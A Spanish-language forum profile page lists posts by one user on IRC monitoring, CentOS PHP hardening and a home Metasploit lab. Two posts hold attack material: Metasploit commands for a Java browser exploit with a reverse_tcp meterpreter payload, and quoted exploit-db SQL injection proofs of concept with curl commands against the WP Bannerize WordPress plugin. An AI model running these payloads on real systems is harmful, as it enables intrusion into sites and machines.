Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - TapIt

#1
Buenísimo WHK! Hacia un muchísimo tiempo que no pasaba por este foro y me ha dado mucha pena ver algunas cosas. Me sorprende que este post no tenga ningun comentario.

Buenísimo de verdad.

Saludos! ;)
#2
Muchas gracias, tirare por ahi entonces. Creo que python es una buena forma de comenzar.

Saludos!
#3
Mensajería / Monitorizar IRC desde el cliente
24 Febrero 2014, 11:17 AM
Hola a todos,

Estoy realizando un trabajo sobre IRC y me gustaría obtener información sobre los programas o tecnicas para un canal pero desde el lado del cliente. Guardar conversaciones publicas, conexiones y desconexiones de usuarios... etc.

¿Sabeis si existe algo al respecto? Gracias por adelantado,

Saludos!
#4
GNU/Linux / Re: Actualizar CentOS PHP 5.3
12 Julio 2013, 14:52 PM
Gracias r32 por tu respuesta!! A ver si alguien más que sepa dice algo...
#5
GNU/Linux / Actualizar CentOS PHP 5.3
11 Julio 2013, 13:30 PM
Hola a todos!!

Estoy intentando fortalecer un servidor Apache Tomcat version: 2.2.15 corriendo en un Centos 6.4. Para hacer unas pruebas iniciales le he tirado OpenVAS y a parte de otras alertas me ha dicho que la version de PHP es 5.3< 5.3.6 y que debe ser actualizada.

Me han comentado que aunque pase esto, puede ser que la version 5.3 para CentOS 6.4 ya este parcheada sin necesidad de actualizarla a una superior. Puede ser esto? Me parece un poco raro pero no se...

Gracias a todos, espero vuestras respuestas ;)
#6
Bugs y Exploits / Re: Escaneo Anonimo?
10 Junio 2013, 22:10 PM
proxychains, TOR... depende puedes empezar investigando por ahí... Saludos!
#7
Bugs y Exploits / Metasploit out of LAN
10 Junio 2013, 20:57 PM
Buenas a todos:

He visto temas parecidos por el foro pero en ninguno se llega a ninguna conclusión sobre el problema.

He montado en casa un laboratorio para testear Metasploit fuera de LAN compuesto por dos ordenadores conectados a 2 routers diferentes de IP pública diferente.

MAQUINA1

PC corriendo Máquina Virtual Kali Linux
IP privada 192.168.1.16
IP publica 88.88.88.88 (inventada por motivos de seguridad)
El router tiene los puertos (80,445 y 4444) fordwardeados a la IP 192.168.1.16

MAQUINA2

Laptot corriendo Máquina Virtual Windows XP SP2 (Java 7 update 6)
El router se supone que no es necesario que tenga ningún puerto abierto puesto que cuando se ejecuta el exploit entra en juego NATP


*******************************************************

En la MAQUINA1

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.1.16
set SRVPORT 80
set URIPATH /ataque

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 88.88.88.88

exploit


En la MAQUINA2

Entro en la URL a través del navegador en la URL 88.88.88.88/ataque

Saltan las alertas de ejecutar un applet de java etc... ACEPTO TODO y parece que se empieza a ejecutar el Applet pero salta una alerta que dice "No se pudo ejecutar el programa".

Metasploit se queda a la espera de un sesión pero no sucede nada... Sinceramente no se que ocurre. He probado el mismo ataque en local y no hay problemas. ¿Alguna idea?

Gracias por adelantado, Saludos ;)


#9
Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/



# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php

---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
   ...
   $limit = intval($_POST['limit']);
   $page_offset = (intval($_POST['offset']) - 1) * $limit;

   foreach($_POST["item"] as $key => $value){
       $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
       $result = mysql_query($sql);
   }
}



http://www.exploit-db.com/exploits/17764/


# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)

---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php

---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
   ...
   $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
   $result = mysql_query($sql);


#10
Muchas gracias a todos, me habeis dado las 2 claves para buscar "hotspot" y "portal cautivo" el resto lo hace google... En el primer vistazo he encontrado howtos, vectores de ataque, auditorias, fortificación resumiendo, bastante para profundizar en el tema.

Gracias otra vez! Saludos